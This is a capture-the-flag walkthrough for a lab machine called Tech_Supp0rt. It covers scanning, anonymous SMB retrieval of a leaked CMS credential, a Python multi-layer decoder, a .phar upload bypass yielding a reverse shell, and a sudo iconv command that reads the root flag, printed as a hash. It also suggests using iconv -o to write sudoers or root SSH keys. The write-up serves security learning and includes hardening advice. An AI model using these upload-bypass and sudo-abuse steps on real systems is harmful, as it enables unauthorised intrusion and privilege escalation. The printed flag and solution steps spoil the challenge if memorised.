Tech_Supp0rt: 1

Hack into the machine and investigate the target.
Please allow about 5 minutes for the machine to fully boot!
Note: The theme and security warnings encountered in this room are part of the challenge.

Nmap Scan

nmap 10.10.14.121 -sC -sV -p-

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

Gobuster – Web Directory Brute Force

gobuster dir -u http://10.10.14.121 -w /usr/share/wordlists/dirb/common.txt -x php,txt,HTML

/.php (Status: 403) [Size: 277]
/.htm (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 277]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.14.121/wordpress/]
/test (Status: 301) [Size: 311] [--> http://10.10.14.121/test/]

SMB was open, so I checked for anonymous access.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        websvr          Disk
        IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))

I connected to websvr anonymously; the only file in the share was enter.txt, so I pulled it down.

smbclient //10.10.14.121/websvr -N
smb: \> ls
  enter.txt
smb: \> get enter.txt

GOALS

1) Make fake popup and host it online on Digital Ocean server
2) Fix subrion site, /subrion doesn’t work, edit from panel
3) Edit WordPress website

IMP

Subrion creds
|-> admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
WordPress creds
|-> (missing)

I pasted 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk into CyberChef (https://gchq.github.io/CyberChef) and ran the Magic operation. It identified the encoding (Base58 on the outside) and recovered the Subrion password: Scam2021.
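To reproduce the CyberChef result offline, here is an added Python example (my code, not from the room or the write-up). It implements Base58 decoding with the Bitcoin alphabet and then peels the layers in the order my own decoding of this string found them: Base58, then Base32, then Base64 (the layer order, the printable-ASCII check after each layer, which is the heuristic Magic relies on, and the helper names are my assumptions).

```python
from __future__ import annotations

import base64

# Bitcoin/IPFS Base58 alphabet: no 0, O, I or l, which is why the
# credential string looks like "random" text rather than Base64.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(data: bytes) -> bytes:
    """Decode Base58 (no checksum). Each leading '1' is a 0x00 byte."""
    text = data.decode("ascii")
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-Base58 char
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


# Decoders in the order they are applied to the enter.txt credential.
# b32decode is case-sensitive and requires '=' padding; both are present
# because CyberChef emitted the inner layers with padding.
LAYERS = [
    ("Base58", b58decode),
    ("Base32", base64.b32decode),
    ("Base64", base64.b64decode),
]


def is_printable_ascii(data: bytes) -> bool:
    return bool(data) and all(32 <= b < 127 for b in data)


def peel(blob: str, layers=LAYERS) -> tuple[str, list[str]]:
    """Apply each decoder in turn; every intermediate must stay printable text.

    Returns (plaintext, names of layers applied). Stops with ValueError if a
    layer yields binary junk, which is the sign of a wrong recipe.
    """
    current = blob.encode("ascii")
    applied: list[str] = []
    for name, fn in layers:
        out = fn(current)
        if not is_printable_ascii(out):
            raise ValueError(f"{name} layer produced non-text output; wrong recipe")
        applied.append(name)
        current = out
    return current.decode("ascii"), applied


if __name__ == "__main__":
    # Credential string exactly as found in enter.txt on the websvr share.
    password, recipe = peel("7sKvntXdPEJaxazce9PXi24zaFrLiKWCk")
    print(" -> ".join(recipe), ":", password)
```

The printable check is what makes the chain stop at the right place: the final value Scam2021 happens to be valid Base64 too, but decoding it once more produces non-printable bytes, so a greedy decoder would over-decode without that guard.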

Next target: Subrion. Subrion is a CMS, and http://10.10.14.121/subrion really was broken, as enter.txt said. A search for the default Subrion admin panel location gave /panel.

Browsing to http://10.10.14.121/subrion/panel brought up the Subrion admin login, and the decoded credentials worked. The panel has a file upload feature. This part took a while: uploads with a .php extension were rejected, but after trying other extensions I found that .phar was accepted. I renamed my reverse shell to shell.phar, uploaded it and requested http://10.10.14.121/subrion/uploads/shell.phar, and my Netcat listener caught the connection. The reason .phar executes is that Ubuntu's Apache PHP module configuration maps .phar and .phtml to the PHP handler alongside .php, so a denylist that only blocks .php is bypassable.
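To make the bypass concrete, here is an added Python example (mine, not code from Subrion or the room). It reconstructs what the panel's check appears to do as a denylist on .php (an assumption; the real Subrion check is not shown on this page), compares it with an allowlist, and tests both against the handler regex from Ubuntu's Apache PHP module configuration, which is the part that decides whether a stored file actually runs. The candidate filenames are constructed for the demonstration.

```python
import os
import re

# Handler pattern from Ubuntu's /etc/apache2/mods-available/php7.0.conf:
#   <FilesMatch ".+\.ph(ar|p|tml)$">  SetHandler application/x-httpd-php
# Anything matching this is executed as PHP no matter what the upload form thought.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

# Reconstruction of the weak check (assumed): block only the obvious extension.
DENYLIST = {".php"}

# The fix: accept a short list of expected types and nothing else.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def denylist_allows(filename: str) -> bool:
    """Weak filter: rejects .php and accepts everything else."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened filter: the final extension must be on the allowlist."""
    return os.path.splitext(filename)[1].lower() in ALLOWLIST


def apache_executes(filename: str) -> bool:
    """Would Apache hand this file to the PHP interpreter?"""
    return PHP_HANDLER.match(filename) is not None


def upload_bypass(filename: str, check) -> bool:
    """True when the filter accepts the file AND Apache would run it as code."""
    return check(filename) and apache_executes(filename)


# Constructed candidates an attacker would try against the upload form.
CANDIDATES = ["shell.php", "shell.phar", "shell.phtml", "shell.php.png", "shell.png"]


def find_bypasses(check) -> list:
    """Names from CANDIDATES that get past `check` and still execute."""
    return [name for name in CANDIDATES if upload_bypass(name, check)]


if __name__ == "__main__":
    print("denylist bypasses:", find_bypasses(denylist_allows))
    print("allowlist bypasses:", find_bypasses(allowlist_allows))
```

Even with the allowlist, uploads belong outside the web root (or in a directory where the PHP handler is disabled) and under a server-generated name; the extension check is the first gate, not the only one.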

This gave me a low-privilege shell as www-data.

Once on the scamsite account, checking sudo privileges:

sudo -l

Result:

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Abusing iconv to Read Root Flag

Since iconv runs as root without a password, it can read any file, including the root flag. This is the GTFOBins trick: converting from and to the same charset leaves the content unchanged, so the file is simply printed:

```bash
sudo iconv -f 8859_1 -t 8859_1 /root/root.txt
```

851b8233a8c09400ec30651bd1529bf1ed02790b

The same rule also gives arbitrary file write as root, because iconv accepts an output file (-o). Writing a sudoers entry or an SSH key for root that way is the step from a single flag read to a full root shell.